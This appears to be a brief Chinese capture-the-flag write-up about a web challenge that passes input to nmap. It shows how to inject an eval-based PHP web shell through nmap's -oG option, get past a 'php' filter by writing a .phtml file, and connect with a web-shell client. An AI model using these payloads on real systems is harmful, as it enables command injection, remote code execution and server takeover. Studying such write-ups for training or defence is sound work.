nmap命令执行
打开页面后,我们可以看见nmap,然后又看见是扫描ip的,所以我们可以知道它是使用nmap来扫描局域网内的ip地址的,而nmap命令有个可以创建并写代码的命令
可以构造
1 | '<?php @eval($_POST["hack']);?> -oG hack.php' |
来创建一个hack.php文件并在文件中写上
1 | <?php @eval($_POST["hack"]);?> |
然后访问
1 | http://url/hack.php |
即可以访问hack.php文件
但是这里php被过滤掉了,所以我们可以使用phtml文件,可以构造
1 | '<?=@eval($_POST["hack"]);?> -oG hack.phtml' |
然后访问hack.phtml文件
1 | http://url/hack.phtml |
此时我们可以利用蚁剑连接就行
这个可以和“escapeshellarg和escapeshellcmd函数重过滤绕过”这一篇文章结合着看